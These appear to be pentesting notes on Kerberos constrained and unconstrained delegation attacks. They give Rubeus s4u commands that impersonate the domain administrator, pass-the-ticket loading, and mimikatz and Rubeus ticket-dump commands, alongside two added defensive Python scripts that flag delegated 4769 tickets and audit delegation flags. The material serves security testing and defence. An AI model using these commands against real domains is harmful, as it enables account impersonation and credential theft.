Pentesting Notes

Delegation attacks

Constrained delegation

If you have compromised a user account or a computer (machine account) that has Kerberos constrained delegation enabled, it is possible to impersonate any domain user (including Administrator) and authenticate to a service that the compromised account is trusted to delegate to.

Enumerate constrained delegation

Get-DomainUser -TrustedToAuth

Get-DomainComputer -TrustedToAuth -Properties DnsHostName, MSDS-AllowedToDelegateTo

Exploit with Rubeus

.\Rubeus.exe hash /password:<password>
.\Rubeus.exe asktgt /user:<user> /domain:<domain> /aes256:<AES hash>
.\Rubeus.exe s4u /ticket:<ticket> /impersonateuser:administrator /msdsspn:<spn_constrained> /altservice:HTTP /ptt

Example:

.\Rubeus.exe s4u /user:MS02$ /rc4:dc7a49c0c36399ae87f3de623ebab985 /impersonateuser:administrator /msdsspn:"cifs/domain.com" /altservice:cifs,host /ptt

Example with base64 ticket:

# Save TGS to file
Rubeus.exe s4u /ticket:<base64 ticket> /impersonateuser:Micheal.Crosley /domain:m3c.local /msdsspn:"time/m3webaw" /altservice:http /outfile:TGS_micheal_TIMER

After saving the ticket you can load it manually in memory with:

Rubeus.exe ptt /ticket:path_to_ticket
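On the defensive side, the S4U flow above leaves a trace in the domain controller's Security log: the service ticket for the impersonated user is logged as event 4769 (a Kerberos service ticket was requested) with the delegating account in the "Transited Services" field instead of "-". The following is an added example, not part of these notes or of Rubeus, that parses constructed 4769 message text and flags delegated tickets. The two sample events, host names, SIDs and addresses are invented for the example; it assumes the Transited Services field names the delegating service as it does for S4U2proxy-issued tickets.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample text of two 4769 events (Kerberos service ticket requested).
# The first is an ordinary ticket request; the second has the shape of a ticket
# obtained through constrained delegation: the impersonated user appears as the
# Account Name and the delegating machine account in Transited Services.
SAMPLE_4769_EVENTS = [
    """A Kerberos service ticket was requested.

Account Information:
    Account Name:        jdoe@DOMAIN.LOCAL
    Account Domain:      DOMAIN.LOCAL

Service Information:
    Service Name:        FS01$
    Service ID:          S-1-5-21-1111-2222-3333-1105

Network Information:
    Client Address:      ::ffff:10.10.10.25
    Client Port:         51233

Additional Information:
    Ticket Options:      0x40810000
    Ticket Encryption Type: 0x12
    Failure Code:        0x0
    Transited Services:  -
""",
    """A Kerberos service ticket was requested.

Account Information:
    Account Name:        administrator@DOMAIN.LOCAL
    Account Domain:      DOMAIN.LOCAL

Service Information:
    Service Name:        DC01$
    Service ID:          S-1-5-21-1111-2222-3333-1000

Network Information:
    Client Address:      ::ffff:10.10.10.40
    Client Port:         49712

Additional Information:
    Ticket Options:      0x40810000
    Ticket Encryption Type: 0x17
    Failure Code:        0x0
    Transited Services:  MS02$@DOMAIN.LOCAL
""",
]

# "Key:   value" lines; tabs or spaces are accepted, section headers
# ("Account Information:") have no value and do not match.
FIELD_RE = re.compile(r"^[ \t]*(?P<key>[A-Za-z ]+):[ \t]+(?P<value>\S.*?)[ \t]*$", re.MULTILINE)

RC4_HMAC = 0x17                      # etype 23, the weak type used by the /rc4 example above
SENSITIVE_ACCOUNTS = {"administrator"}  # watchlist of accounts that should never be delegated


@dataclass
class TicketRequest:
    account: str
    service: str
    client_address: str
    enc_type: int
    transited_services: Optional[str]  # None when the event shows "-"


@dataclass
class Alert:
    request: TicketRequest
    reasons: List[str]


def parse_4769(text: str) -> TicketRequest:
    """Extract the fields a delegation detection needs from one 4769 message."""
    fields = {m.group("key"): m.group("value") for m in FIELD_RE.finditer(text)}
    transited = fields.get("Transited Services", "-")
    return TicketRequest(
        account=fields["Account Name"],
        service=fields["Service Name"],
        client_address=fields["Client Address"],
        enc_type=int(fields["Ticket Encryption Type"], 16),
        transited_services=None if transited == "-" else transited,
    )


def find_delegated_tickets(events: List[str]) -> List[Alert]:
    """Return one Alert per ticket that was issued through delegation (S4U2proxy)."""
    alerts = []
    for text in events:
        req = parse_4769(text)
        if req.transited_services is None:
            continue  # direct request by the user, nothing delegated
        reasons = [f"ticket obtained through delegation by {req.transited_services}"]
        if req.account.split("@")[0].lower() in SENSITIVE_ACCOUNTS:
            reasons.append("impersonated account is on the sensitive watchlist")
        if req.enc_type == RC4_HMAC:
            reasons.append("RC4-HMAC ticket (etype 0x17)")
        alerts.append(Alert(req, reasons))
    return alerts


if __name__ == "__main__":
    for alert in find_delegated_tickets(SAMPLE_4769_EVENTS):
        r = alert.request
        print(f"{r.account} -> {r.service} from {r.client_address}: " + "; ".join(alert.reasons))
```

Any delegation of a watchlisted account is worth an alert on its own, since such accounts should carry the "Account is sensitive and cannot be delegated" flag or sit in Protected Users, which makes S4U2proxy fail for them.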

Unconstrained delegation

Get unconstrained delegation machines

  • BloodHound will list this too

Get-NetComputer -Unconstrained
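The PowerView switches used in both enumeration sections (`-TrustedToAuth` and `-Unconstrained`) read the same two attributes an auditor would check: bits of `userAccountControl` and the `msDS-AllowedToDelegateTo` list. The script below is an added example, not code from these notes or from PowerView, that applies that logic to a constructed stand-in for an LDAP export and reports every delegation configuration worth reviewing, including privileged accounts that are still delegable. The account names, DNs and SPNs are invented; the flag values are the documented `userAccountControl` bits.

```python
from dataclasses import dataclass
from typing import Dict, List

# userAccountControl bits that govern delegation (ADS_USER_FLAG values).
TRUSTED_FOR_DELEGATION = 0x80000             # unconstrained delegation
NOT_DELEGATED = 0x100000                     # "Account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # constrained delegation with protocol transition
DOMAIN_CONTROLLERS_RID = 516                 # primaryGroupID of DC computer accounts

SENSITIVE_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}

# Constructed stand-in for an LDAP export. Attribute names are the real AD names,
# every value is invented for this example. Other bits present in the values:
# 0x200 NORMAL_ACCOUNT, 0x1000 WORKSTATION_TRUST_ACCOUNT, 0x2000 SERVER_TRUST_ACCOUNT,
# 0x10000 DONT_EXPIRE_PASSWORD.
SAMPLE_OBJECTS = [
    {"sAMAccountName": "DC01$", "userAccountControl": 0x82000, "primaryGroupID": 516},
    {"sAMAccountName": "WEB01$", "userAccountControl": 0x81000},
    {"sAMAccountName": "MS02$", "userAccountControl": 0x1001000,
     "msDS-AllowedToDelegateTo": ["cifs/dc01.domain.local", "host/dc01.domain.local"]},
    {"sAMAccountName": "svc_web", "userAccountControl": 0x10200,
     "msDS-AllowedToDelegateTo": ["http/app01.domain.local"]},
    {"sAMAccountName": "administrator", "userAccountControl": 0x200,
     "memberOf": ["CN=Domain Admins,CN=Users,DC=domain,DC=local"]},
    {"sAMAccountName": "da_ops", "userAccountControl": 0x100200,
     "memberOf": ["CN=Domain Admins,CN=Users,DC=domain,DC=local",
                  "CN=Protected Users,CN=Users,DC=domain,DC=local"]},
]


@dataclass
class Finding:
    account: str
    kind: str     # unconstrained | constrained | constrained+protocol-transition | sensitive-delegable
    detail: str


def group_cn(dn: str) -> str:
    """'CN=Domain Admins,CN=Users,DC=x' -> 'Domain Admins'."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def audit_delegation(objects: List[dict]) -> List[Finding]:
    findings = []
    for obj in objects:
        name = obj["sAMAccountName"]
        uac = obj["userAccountControl"]
        targets = obj.get("msDS-AllowedToDelegateTo", [])
        groups = {group_cn(dn) for dn in obj.get("memberOf", [])}
        is_dc = obj.get("primaryGroupID") == DOMAIN_CONTROLLERS_RID

        # Domain controllers carry TRUSTED_FOR_DELEGATION by default; anything else is a finding.
        if uac & TRUSTED_FOR_DELEGATION and not is_dc:
            findings.append(Finding(name, "unconstrained",
                "caches the TGT of every principal that authenticates to it"))

        if targets:
            if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
                findings.append(Finding(name, "constrained+protocol-transition",
                    "can request tickets as any non-protected user to " + ", ".join(targets)
                    + " without that user authenticating (S4U2self + S4U2proxy)"))
            else:
                findings.append(Finding(name, "constrained",
                    "Kerberos-only delegation to " + ", ".join(targets)))

        # Privileged accounts should be marked non-delegable or be in Protected Users.
        if (groups & SENSITIVE_GROUPS and not uac & NOT_DELEGATED
                and "Protected Users" not in groups):
            findings.append(Finding(name, "sensitive-delegable",
                "privileged account is neither 'cannot be delegated' nor in Protected Users"))
    return findings


def findings_by_account(objects: List[dict]) -> Dict[str, List[str]]:
    """Map each flagged account to the kinds of finding raised for it."""
    result: Dict[str, List[str]] = {}
    for f in audit_delegation(objects):
        result.setdefault(f.account, []).append(f.kind)
    return result


if __name__ == "__main__":
    for f in audit_delegation(SAMPLE_OBJECTS):
        print(f"[{f.kind}] {f.account}: {f.detail}")
```

Against the sample data this reports WEB01$ (unconstrained), MS02$ (constrained with protocol transition, the configuration behind the `/rc4` example above), svc_web (Kerberos-only constrained) and the built-in administrator (privileged but still delegable); DC01$ is skipped as an expected default and da_ops is clean because it is both marked non-delegable and a Protected Users member.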

Get tickets

.\mimikatz.exe "sekurlsa::tickets /export" exit
.\Rubeus.exe dump /service:krbtgt /nowrap
